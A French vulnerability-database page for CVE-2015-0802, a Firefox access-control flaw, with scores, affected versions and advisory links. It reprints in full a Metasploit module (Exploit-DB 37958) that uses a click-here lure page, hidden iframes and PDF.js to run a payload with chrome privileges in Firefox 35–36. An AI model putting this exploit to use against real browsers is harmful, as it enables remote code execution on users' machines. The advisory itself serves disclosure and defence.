CVE-2015-0802

OWSAP

A01-Broken Access Control

EPSS

39.65%V3

Vecteur

Network

Publié

2015-04-01 08:00 +00:00

Dernière modif.

2017-09-16 07:57 +00:00

Liens officiels

CVE.org

NVD

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des alertes

Liste des Alertes

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez sécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2024-1234

Planificiations

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions

Mozilla Firefox before 37.0 relies on docshell type information instead of page principal information for Window.webidl access control, which might allow remote attackers to execute arbitrary JavaScript code with chrome privileges via certain content navigation that leverages the reachability of a privileged window with an unintended persistence of access to restricted internal methods.

Informations

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-264	Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metric	Score	Sévérité	CVSS Vecteur	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:P/A:N	[email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 37958

Date de publication : 2015-08-23 22:00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox PDF.js Privileged Javascript Injection', 'Description' => %q{ This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'Author' => [ 'Unknown', # PDF.js injection code was taken from a 0day 'Marius Mlynski', # discovery and pwn2own exploit 'joev' # copypasta monkey, CVE-2015-0802 ], 'DisclosureDate' => "Mar 31 2015", 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0816'], # pdf.js can load chrome:// ['CVE', '2015-0802'] # can access messageManager property in chrome window ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(35, 36) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) print_status('Sending exploit...') send_response_html(cli, html) end def html "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+ "<script>#{js}</script></body></html>" end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def js key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin <<-EOJS function xml2string(obj) { return new XMLSerializer().serializeToString(obj); } function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__; } function get(path, callback, timeout, template, value) { callback = _(callback); if (template && value) { callback = callback.replace(template, value); } js_call1 = 'javascript:' + _(function() { try { done = false; window.onclick = function() { if (done) { return; } done = true; q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px"); setTimeout(function(){ q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; q.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ q.close(); }, 100) }, 100) }, 100); } } catch (e) { history.back(); } undefined; }, "%url%", path); js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call2); })); }), timeout); } function get_data(obj) { data = null; try { data = obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch (e) { if (this.document instanceof XMLDocument) { data = xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') { data = this.document.body.firstChild.textContent; } else { throw new Error(); } } catch (e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {; return null; } else { throw new Error(); } } catch (e) { ;; } } } } return data; } function _(s, template, value) { s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1]; s = s.substring(0, s.length - 1); if (template && value) { s = s.replace(template, value); } s += __proto; s += xml2string; s += get_data; s = s.replace(/\\s\\/\\/.*\\n/g, ""); s = s + ";undefined"; return s; } function get_sandbox_context() { if (window.my_win_id == null) { for (var i = 0; i < 20; i++) { try { if (window[i].location.toString().indexOf("view-source:") != -1) { my_win_id = i; break; } } catch (e) {} } }; if (window.my_win_id == null) return; clearInterval(sandbox_context_i); object.data = 'view-source:' + blobURL; window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,'; object.data = 'data:text/html,<'+'html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+ '"position:absolute; left:-9999px;" onload = "'+_(function(){ window.wrappedJSObject.sandboxContext=(function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>'); } var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;'; var i = document.createElement("iframe"); i.id = "i"; i.style=HIDDEN; i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>"; document.documentElement.appendChild(i); i.onload = function() { if (this.contentDocument.styleSheets.length > 0) { var i2 = document.createElement("iframe"); i2.id = "i2"; i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;'; i2.height = window.innerHeight+'px'; i2.width = window.innerWidth+'px'; i2.src = "data:application/pdf,"; document.documentElement.appendChild(i2); pdfBlob = new Blob([''], { type: 'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object'); object.style=HIDDEN; object.data = 'data:application/pdf,'; object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context, 200); object.onload = null; object.data = 'view-source:' + location.href; return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); } } document.body.style.height = window.innerHeight+'px'; var kill = setInterval(function() { if (window.sandboxContext) { var f = "chrome://browser/content/browser.xul"; get(f, function() {}, 0, "%URL%", f); clearInterval(kill); } else { return; } },20); EOJS end end

Products Mentioned

Configuraton 0

Opensuse>>Opensuse >> Version 13.1

Opensuse>>Opensuse >> Version 13.1 (Open CPE detail)

Opensuse>>Opensuse >> Version 13.2

Opensuse>>Opensuse >> Version 13.2 (Open CPE detail)

Configuraton 0

Canonical>>Ubuntu_linux >> Version 12.04

Canonical>>Ubuntu_linux >> Version 12.04 (Open CPE detail)

Canonical>>Ubuntu_linux >> Version 14.04

Canonical>>Ubuntu_linux >> Version 14.04 (Open CPE detail)

Canonical>>Ubuntu_linux >> Version 14.10

Canonical>>Ubuntu_linux >> Version 14.10 (Open CPE detail)

Configuraton 0

Mozilla>>Firefox >> Version To (including) 36.0.4

Mozilla>>Firefox >> Version - (Open CPE detail)
Mozilla>>Firefox >> Version - (Open CPE detail)
Mozilla>>Firefox >> Version - (Open CPE detail)
Mozilla>>Firefox >> Version 0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 0.6.1 (Open CPE detail)
Mozilla>>Firefox >> Version 0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 0.7.1 (Open CPE detail)
Mozilla>>Firefox >> Version 0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 0.9.1 (Open CPE detail)
Mozilla>>Firefox >> Version 0.9.2 (Open CPE detail)
Mozilla>>Firefox >> Version 0.9.3 (Open CPE detail)
Mozilla>>Firefox >> Version 0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 0.10.1 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 1.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 1.4.1 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.11 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.0.12 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.1 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.2 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.3 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.4 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.5 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.6 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.7 (Open CPE detail)
Mozilla>>Firefox >> Version 1.5.8 (Open CPE detail)
Mozilla>>Firefox >> Version 1.8 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.11 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.12 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.13 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.14 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.15 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.16 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.17 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.18 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.19 (Open CPE detail)
Mozilla>>Firefox >> Version 2.0.0.20 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.11 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.12 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.13 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.14 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.15 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.16 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.17 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.18 (Open CPE detail)
Mozilla>>Firefox >> Version 3.0.19 (Open CPE detail)
Mozilla>>Firefox >> Version 3.1 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.1 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.2 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.3 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.4 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.5 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.7 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.8 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.9 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.10 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.11 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.12 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.13 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.14 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.15 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.16 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.17 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.18 (Open CPE detail)
Mozilla>>Firefox >> Version 3.5.19 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.2 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.3 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.4 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.6 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.7 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.8 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.9 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.10 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.11 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.12 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.13 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.14 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.15 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.16 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.17 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.18 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.19 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.20 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.21 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.22 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.23 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.24 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.25 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.26 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.27 (Open CPE detail)
Mozilla>>Firefox >> Version 3.6.28 (Open CPE detail)
Mozilla>>Firefox >> Version 3.7 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 4.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 5.0 (Open CPE detail)
Mozilla>>Firefox >> Version 5.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 6.0 (Open CPE detail)
Mozilla>>Firefox >> Version 6.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 6.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 7.0 (Open CPE detail)
Mozilla>>Firefox >> Version 7.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 8.0 (Open CPE detail)
Mozilla>>Firefox >> Version 8.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 9.0 (Open CPE detail)
Mozilla>>Firefox >> Version 9.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.11 (Open CPE detail)
Mozilla>>Firefox >> Version 10.0.12 (Open CPE detail)
Mozilla>>Firefox >> Version 11.0 (Open CPE detail)
Mozilla>>Firefox >> Version 12.0 (Open CPE detail)
Mozilla>>Firefox >> Version 12.0 (Open CPE detail)
Mozilla>>Firefox >> Version 12.0 (Open CPE detail)
Mozilla>>Firefox >> Version 13.0 (Open CPE detail)
Mozilla>>Firefox >> Version 13.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 14.0 (Open CPE detail)
Mozilla>>Firefox >> Version 14.0 (Open CPE detail)
Mozilla>>Firefox >> Version 14.0 (Open CPE detail)
Mozilla>>Firefox >> Version 14.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 15.0 (Open CPE detail)
Mozilla>>Firefox >> Version 15.0 (Open CPE detail)
Mozilla>>Firefox >> Version 15.0 (Open CPE detail)
Mozilla>>Firefox >> Version 15.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 15.1 (Open CPE detail)
Mozilla>>Firefox >> Version 16.0 (Open CPE detail)
Mozilla>>Firefox >> Version 16.0 (Open CPE detail)
Mozilla>>Firefox >> Version 16.0 (Open CPE detail)
Mozilla>>Firefox >> Version 16.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 16.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 16.1 (Open CPE detail)
Mozilla>>Firefox >> Version 16.2 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.4 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.6 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.7 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.8 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.9 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.10 (Open CPE detail)
Mozilla>>Firefox >> Version 17.0.11 (Open CPE detail)
Mozilla>>Firefox >> Version 17.1 (Open CPE detail)
Mozilla>>Firefox >> Version 17.2 (Open CPE detail)
Mozilla>>Firefox >> Version 17.3 (Open CPE detail)
Mozilla>>Firefox >> Version 18.0 (Open CPE detail)
Mozilla>>Firefox >> Version 18.0 (Open CPE detail)
Mozilla>>Firefox >> Version 18.0 (Open CPE detail)
Mozilla>>Firefox >> Version 18.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 18.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 18.1 (Open CPE detail)
Mozilla>>Firefox >> Version 18.2 (Open CPE detail)
Mozilla>>Firefox >> Version 19.0 (Open CPE detail)
Mozilla>>Firefox >> Version 19.0 (Open CPE detail)
Mozilla>>Firefox >> Version 19.0 (Open CPE detail)
Mozilla>>Firefox >> Version 19.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 19.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 19.1 (Open CPE detail)
Mozilla>>Firefox >> Version 20.0 (Open CPE detail)
Mozilla>>Firefox >> Version 20.0 (Open CPE detail)
Mozilla>>Firefox >> Version 20.0 (Open CPE detail)
Mozilla>>Firefox >> Version 20.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 20.1 (Open CPE detail)
Mozilla>>Firefox >> Version 20.2 (Open CPE detail)
Mozilla>>Firefox >> Version 21.0 (Open CPE detail)
Mozilla>>Firefox >> Version 21.0 (Open CPE detail)
Mozilla>>Firefox >> Version 21.0 (Open CPE detail)
Mozilla>>Firefox >> Version 22.0 (Open CPE detail)
Mozilla>>Firefox >> Version 22.0 (Open CPE detail)
Mozilla>>Firefox >> Version 22.0 (Open CPE detail)
Mozilla>>Firefox >> Version 23.0 (Open CPE detail)
Mozilla>>Firefox >> Version 23.0 (Open CPE detail)
Mozilla>>Firefox >> Version 23.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 24.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.1 (Open CPE detail)
Mozilla>>Firefox >> Version 24.1 (Open CPE detail)
Mozilla>>Firefox >> Version 24.1 (Open CPE detail)
Mozilla>>Firefox >> Version 24.1.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.1.1 (Open CPE detail)
Mozilla>>Firefox >> Version 24.2.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.3.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.5.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.6.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.7.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.8.0 (Open CPE detail)
Mozilla>>Firefox >> Version 24.8.1 (Open CPE detail)
Mozilla>>Firefox >> Version 25.0 (Open CPE detail)
Mozilla>>Firefox >> Version 25.0 (Open CPE detail)
Mozilla>>Firefox >> Version 25.0 (Open CPE detail)
Mozilla>>Firefox >> Version 25.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 25.1 (Open CPE detail)
Mozilla>>Firefox >> Version 26.0 (Open CPE detail)
Mozilla>>Firefox >> Version 26.0 (Open CPE detail)
Mozilla>>Firefox >> Version 27.0 (Open CPE detail)
Mozilla>>Firefox >> Version 27.0 (Open CPE detail)
Mozilla>>Firefox >> Version 27.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 28.0 (Open CPE detail)
Mozilla>>Firefox >> Version 28.0 (Open CPE detail)
Mozilla>>Firefox >> Version 29.0 (Open CPE detail)
Mozilla>>Firefox >> Version 29.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 30.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.1.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.1.1 (Open CPE detail)
Mozilla>>Firefox >> Version 31.2.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.3.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.4.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.5.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.5.2 (Open CPE detail)
Mozilla>>Firefox >> Version 31.5.3 (Open CPE detail)
Mozilla>>Firefox >> Version 31.6.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.7.0 (Open CPE detail)
Mozilla>>Firefox >> Version 31.8.0 (Open CPE detail)
Mozilla>>Firefox >> Version 32.0 (Open CPE detail)
Mozilla>>Firefox >> Version 32.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 32.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 32.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 33.0 (Open CPE detail)
Mozilla>>Firefox >> Version 33.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 33.0.2 (Open CPE detail)
Mozilla>>Firefox >> Version 33.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 33.1 (Open CPE detail)
Mozilla>>Firefox >> Version 33.1.1 (Open CPE detail)
Mozilla>>Firefox >> Version 34.0 (Open CPE detail)
Mozilla>>Firefox >> Version 34.0.5 (Open CPE detail)
Mozilla>>Firefox >> Version 35.0 (Open CPE detail)
Mozilla>>Firefox >> Version 35.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 36.0 (Open CPE detail)
Mozilla>>Firefox >> Version 36.0.1 (Open CPE detail)
Mozilla>>Firefox >> Version 36.0.3 (Open CPE detail)
Mozilla>>Firefox >> Version 36.0.4 (Open CPE detail)

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1124898
Tags : x_refsource_CONFIRM

http://www.securitytracker.com/id/1031996
Tags : vdb-entry, x_refsource_SECTRACK

https://security.gentoo.org/glsa/201512-10
Tags : vendor-advisory, x_refsource_GENTOO

http://www.mozilla.org/security/announce/2015/mfsa2015-42.html
Tags : x_refsource_CONFIRM

https://www.exploit-db.com/exploits/37958/
Tags : exploit, x_refsource_EXPLOIT-DB

http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
Tags : x_refsource_CONFIRM

http://www.ubuntu.com/usn/USN-2550-1
Tags : vendor-advisory, x_refsource_UBUNTU

http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00003.html
Tags : vendor-advisory, x_refsource_SUSE

Listes Vulnérabilités

Classé par Année

Statistiques CVE

Vues spécifiques

Listes des Vendeurs

Listes des Produits

Listes CWE

Vues spécifiques

7 Derniers CWE

Listes CAPEC

Vues spécifiques

7 derniers CAPEC

CVE-2015-0802

Alerte pour un CVE

Fonctionnalité nécessitant une connexion

Descriptions

Informations

Faiblesses connexes

Metrics

EPSS

EPSS Score

EPSS Percentile

Informations sur l'Exploit

Exploit Database EDB-ID : 37958

Products Mentioned

Configuraton 0

Configuraton 0

Configuraton 0

References

Listes Vulnérabilités

Classé par Année

Statistiques CVE

Vues spécifiques

